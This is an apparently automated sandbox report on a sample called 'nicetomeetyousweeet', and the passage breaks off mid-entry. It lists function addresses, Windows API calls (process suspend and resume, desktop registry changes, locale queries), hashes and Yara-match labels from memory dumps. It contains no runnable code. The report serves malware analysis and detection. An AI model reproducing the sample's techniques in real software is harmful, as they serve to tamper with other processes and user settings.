                                                                                • ExitProcess.KERNEL32 ref: 007C27F5
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                • Instruction ID: 758a9f119209ef7b81ed25ba5c8842355b8ebce7120e298ff33a80361df6d1e9
                                                                                • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                • Instruction Fuzzy Hash: 5DE0B636004608EFCF11AF55ED49E893B69EB50742F00407CF9098A533CB39ED82CA94
                                                                                Function 0041ACC1 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACCC
                                                                                • NtSuspendProcess.NTDLL(00000000), ref: 0041ACD9
                                                                                • CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACE2
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpenSuspend
                                                                                • String ID:
                                                                                • API String ID: 1999457699-0
                                                                                • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                • Instruction ID: f0940f0a464cb9da12e036c8bcda16370f3965740af83b573a45ae51f9acba0f
                                                                                • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                • Instruction Fuzzy Hash: E7D0A733605131638221176A7C0CC87EE6CDFC1EB37024136F404C3220DA30C84186F4
                                                                                Function 0041ACED Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041ACF8
                                                                                • NtResumeProcess.NTDLL(00000000), ref: 0041AD05
                                                                                • CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpenResume
                                                                                • String ID:
                                                                                • API String ID: 3614150671-0
                                                                                • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                • Instruction ID: b64f47c6af987b25b68fadd97e6a7e629856a7b738c344dffca8a71896aa998e
                                                                                • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                • Instruction Fuzzy Hash: DFD0A733504132638220176A7C0CC87EDADDFC5EB37024236F404C3621DA34C841C6F4
                                                                                Function 0078092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$GetProcAddress.$l
                                                                                • API String ID: 0-2784972518
                                                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                • Instruction ID: 1050865b8f551beb30e40799f8e93d2cdd75059be690525d97bedd8af62775e7
                                                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                • Instruction Fuzzy Hash: 83318AB6900609CFDB10DF99C884AAEBBF9FF08324F25404AD841A7311D775EA49CBA4
                                                                                Function 0079BDDE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0079BED3
                                                                                  • Part of subcall function 00792939: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 00792948
                                                                                  • Part of subcall function 00792939: RegSetValueExA.ADVAPI32(004655B0,0046BE08,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0079BEAD,0046BE08,004655B0,00000001,00473EE8,00000000), ref: 00792970
                                                                                  • Part of subcall function 00792939: RegCloseKey.ADVAPI32(004655B0,?,?,0079BEAD,0046BE08,004655B0,00000001,00473EE8,00000000,?,00787C44,00000001), ref: 0079297B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                • String ID: Control Panel\Desktop
                                                                                • API String ID: 4127273184-27424756
                                                                                • Opcode ID: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                                                • Instruction ID: fbaafb40d9f4e4c9227fd9c354fa1ac9e14d715fae2d5b63f4878dc34074c465
                                                                                • Opcode Fuzzy Hash: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                                                • Instruction Fuzzy Hash: CD114532B8061072DD1530396E1FBAE2806D756B61FA4011AF7027A7D7EBCF4A9103DB
                                                                                Function 0079BDD8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0079BED3
                                                                                  • Part of subcall function 00792939: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 00792948
                                                                                  • Part of subcall function 00792939: RegSetValueExA.ADVAPI32(004655B0,0046BE08,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0079BEAD,0046BE08,004655B0,00000001,00473EE8,00000000), ref: 00792970
                                                                                  • Part of subcall function 00792939: RegCloseKey.ADVAPI32(004655B0,?,?,0079BEAD,0046BE08,004655B0,00000001,00473EE8,00000000,?,00787C44,00000001), ref: 0079297B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                • String ID: Control Panel\Desktop
                                                                                • API String ID: 4127273184-27424756
                                                                                • Opcode ID: 71d1e5c445f68871914c285a29d0046b246b6ade461d972b8fac6679235b0182
                                                                                • Instruction ID: d41e2ef67cb7ae722a7a453767fee0db039d49c46c2664c1f3fac367ec9dbbee
                                                                                • Opcode Fuzzy Hash: 71d1e5c445f68871914c285a29d0046b246b6ade461d972b8fac6679235b0182
                                                                                • Instruction Fuzzy Hash: 21F0BB33B8012472DD29357D7F1FBEE1909D786B21F640115F302653E6E78E454242D7
                                                                                Function 00447597 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID: GetLocaleInfoEx
                                                                                • API String ID: 2299586839-2904428671
                                                                                • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                Function 00440E20 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                                                • Instruction ID: cffdc6bb8eb20f5336ace8b102e865ec7dcfb2cf624fb46ac032ba80a60d6a90
                                                                                • Opcode Fuzzy Hash: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                                                • Instruction Fuzzy Hash: 8A024C71E002199BEF14CFA9C9806AEBBF1FF88314F25826AD919E7350D735AD45CB84
                                                                                Function 007C1087 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6f628971186b7869ff55a994468a376647b4631b563bdc3b7b4e6f267e50c07e
                                                                                • Instruction ID: a2dac39e51a7491db2a03eeffe0373b212b4c54ed18a8f239fa38ca71f542fd3
                                                                                • Opcode Fuzzy Hash: 6f628971186b7869ff55a994468a376647b4631b563bdc3b7b4e6f267e50c07e
                                                                                • Instruction Fuzzy Hash: D6022C71E002199BDF14CFA9C880BADBBB1FF89314F65826ED919E7341D735AA41CB90
                                                                                Function 004520D2 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520CD,?,?,00000008,?,?,00455412,00000000), ref: 004522FF
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionRaise
                                                                                • String ID:
                                                                                • API String ID: 3997070919-0
                                                                                • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                • Instruction ID: 47108b7899804ebb5d40a9255b8f0d240b678f8396b787326aeb691ef157153f
                                                                                • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                • Instruction Fuzzy Hash: C0B18F351106089FD715CF28C586B567BE0FF06325F29869AEC99CF3A2C379E986CB44
                                                                                Function 007D2339 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,007D2334,?,?,00000008,?,?,007D5679,00000000), ref: 007D2566
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionRaise
                                                                                • String ID:
                                                                                • API String ID: 3997070919-0
                                                                                • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                • Instruction ID: d78d38d92fbb9a63f0155b325a315c37c49b980a3bf44fcc2ddf19cf9ca9cb74
                                                                                • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                • Instruction Fuzzy Hash: D4B13B316106089FD715CF28C49AB657BB0FF55364F298699E89ACF3A2C339D993CB40
                                                                                Function 00432A49 Relevance: 1.8, Strings: 1, Instructions: 500COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0
                                                                                • API String ID: 0-4108050209
                                                                                • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                • Instruction ID: f72c02501a8b687524d4eed2bba9748ce27a8789a4669d3223b659a6f876a8a8
                                                                                • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                • Instruction Fuzzy Hash: 8002B3727083004BD714DF39D95272EF3E2AFCC758F15492EF499AB391DA78A8058A4A
                                                                                Function 007B2CB0 Relevance: 1.8, Strings: 1, Instructions: 500COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0
                                                                                • API String ID: 0-4108050209
                                                                                • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                • Instruction ID: f09a69a2e3a1e57d23e299bd26508967d2686387badcec475e648cc3631c1b85
                                                                                • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                • Instruction Fuzzy Hash: 7A02A17270D3009BD714EF29D952B6FB3E1BFCC754F15492DF4859B282EE78A8068A42
                                                                                Function 004510BA Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                • String ID:
                                                                                • API String ID: 1663032902-0
                                                                                • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                                • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                                Function 007D1321 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 007C7126: GetLastError.KERNEL32(?,007BE4C7,007B9583,007BE4C7,00475B70,?,007BBBBC,FF8BC35D,00475B70,00473EE8), ref: 007C712A
                                                                                  • Part of subcall function 007C7126: _free.LIBCMT ref: 007C715D
                                                                                  • Part of subcall function 007C7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 007C719E
                                                                                  • Part of subcall function 007C7126: _abort.LIBCMT ref: 007C71A4
                                                                                  • Part of subcall function 007C7126: _free.LIBCMT ref: 007C7185
                                                                                  • Part of subcall function 007C7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 007C7192
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007D1375
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                • String ID:
                                                                                • API String ID: 1663032902-0
                                                                                • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                • Instruction ID: 859d3c6db4150c2e0ac1c646dbc840118b78799fc3b219d860e5292f0148343b
                                                                                • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                • Instruction Fuzzy Hash: B721AF72914206EBDB289A29EC45BBA73B8EF44310F54417BFD01C6A82EB78DD40CB50
                                                                                Function 00450D42 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                • EnumSystemLocalesW.KERNEL32(00450E6A,00000001), ref: 00450DB4
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                • String ID:
                                                                                • API String ID: 1084509184-0
                                                                                • Opcode ID: 9d28c5e255c7ff7bf8c29f4c99fb410e4ec57aee4c7c61eda1ee1a9008b30fc6
                                                                                • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                                                • Opcode Fuzzy Hash: 9d28c5e255c7ff7bf8c29f4c99fb410e4ec57aee4c7c61eda1ee1a9008b30fc6
                                                                                • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                                Function 004512EA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                                                • String ID:
                                                                                • API String ID: 2692324296-0
                                                                                • Opcode ID: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                • Opcode Fuzzy Hash: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                Function 007D1551 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 007C7126: GetLastError.KERNEL32(?,007BE4C7,007B9583,007BE4C7,00475B70,?,007BBBBC,FF8BC35D,00475B70,00473EE8), ref: 007C712A
                                                                                  • Part of subcall function 007C7126: _free.LIBCMT ref: 007C715D
                                                                                  • Part of subcall function 007C7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 007C719E
                                                                                  • Part of subcall function 007C7126: _abort.LIBCMT ref: 007C71A4
                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,007D12EF,00000000,00000000,?), ref: 007D157D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                                                • String ID:
                                                                                • API String ID: 2692324296-0
                                                                                • Opcode ID: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                • Instruction ID: 6840559b9b7556bab9da7b0c246afba46e27d67fb01d2df43995b52f81685813
                                                                                • Opcode Fuzzy Hash: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                • Instruction Fuzzy Hash: 99F0FE32604115BBDB2496149D05BBA7B78EB80314F44056AEC07A3640EA7CFD51C6D0
                                                                                Function 00450DDD Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                • EnumSystemLocalesW.KERNEL32(004510BA,00000001), ref: 00450E29
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                • String ID:
                                                                                • API String ID: 1084509184-0
                                                                                • Opcode ID: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                                • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                                • Opcode Fuzzy Hash: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                                • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                                Function 007D1044 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 007C7126: GetLastError.KERNEL32(?,007BE4C7,007B9583,007BE4C7,00475B70,?,007BBBBC,FF8BC35D,00475B70,00473EE8), ref: 007C712A
                                                                                  • Part of subcall function 007C7126: _free.LIBCMT ref: 007C715D
                                                                                  • Part of subcall function 007C7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 007C719E
                                                                                  • Part of subcall function 007C7126: _abort.LIBCMT ref: 007C71A4
                                                                                • EnumSystemLocalesW.KERNEL32(004510BA,00000001), ref: 007D1090
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                • String ID:
                                                                                • API String ID: 1084509184-0
                                                                                • Opcode ID: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                                • Instruction ID: 47a400dbba32b5cbbb74b2bba91cd2121f2abc247924fa71adb0c877675760d1
